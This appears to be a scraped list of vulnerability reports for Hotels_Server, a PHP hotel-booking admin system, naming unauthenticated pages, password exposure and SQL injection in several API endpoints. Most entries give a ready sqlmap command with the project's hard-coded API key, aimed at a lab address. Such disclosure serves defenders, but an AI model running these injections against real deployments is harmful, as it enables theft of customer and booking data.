Hotels_Server
Hotels_Server copied to clipboard
FantasticLBP
酒店预订系统后台管理系统
Hotels_Server /view/login.php Enter user name unauthenticated user get password login.php post data to doAction.php user name unauthenticated user get password code:  
/view/hotelList.php Unauthorized Access Vulnerability code:  No user authentication code visit link :http://host/view/hotelList.php Can view background data 
In /controller/fetchpwd.php It will receive a parameter called "username" to search for existed users. But in fact,this parameter just become a part of the SQL request without any process,so it...
In /controller/api/login.php It will receive a parameter called "telephone" to search for existed users. But in fact,this parameter just become a part of the SQL request without any process,so it...
url /controller/api/Order.php exist SQL Injection sqlmap -u "http://10.211.55.10/controller/api/Order.php?telephone=1&key=TheHotelReversationApplication&request=1" author: [email protected]
exists sql inject in /controller/api/RandomHotel.php sqlmap -u "http://10.211.55.10/controller/api/RandomHotel.php?key=TheHotelReversationApplication&city=1" author:[email protected]
SQL Injection exists : /controller/api/orderList.php sqlmap -u "http://10.211.55.10/controller/api/orderList.php?telephone=1&request=1" author:[email protected]
SQL Injection exists /controller/api/RevokeOrder.php sqlmap -u "http://10.211.55.10/controller/api/RevokeOrder.php?key=TheHotelReversationApplication&city=1&orderId=1"  author:[email protected]
SQL Injection exists /controller/api/Room.php hotelId sqlmap -u "http://10.211.55.10/controller/api/Room.php?key=TheHotelReversationApplication&hotelId=1" author:[email protected]
payload url : sqlmap -u "http://10.211.55.10/controller/api/hotelList.php?subjectId=2&key=TheHotelReversationApplication&request=1" [email protected]